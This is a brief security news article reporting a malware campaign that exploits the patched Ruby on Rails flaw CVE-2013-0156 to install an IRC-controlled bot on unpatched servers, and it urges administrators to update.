Ruby on Rails exploit could hijack unpatched servers for botnet

Server Administrators are being urged to update their Ruby on Rails servers following the discovery of an active malware campaign targeting vulnerable versions of the web development framework.

According to security researcher Jeff Jarmoc, Hackers are exploiting a known and patched vulnerability in coding language Ruby on Rails, which allows a remote user to edit the web server’s crontab to download a file to the /tmp directory where it is compiled and executed.

The exploit that is currently being used by attackers adds a custom cron job (a scheduled task on Linux machines) that executes a sequence of commands.

“Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers,” Jarmoc blogged. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”

The original flaw, announced in CVE-2013-0156, is located in the Ruby on Rails code that processes parameters.

Using this loophole hackers can download a malicious C source file from a remote server, can compile it locally and execute it. The resulting malware is a bot that connects to an IRC (Internet Relay Chat) server and joins a predefined channel where it waits for commands from the attackers.

Users should update the Ruby on Rails installations on their servers to at least versions i.e 3.2.13 which contain the patch for this vulnerability.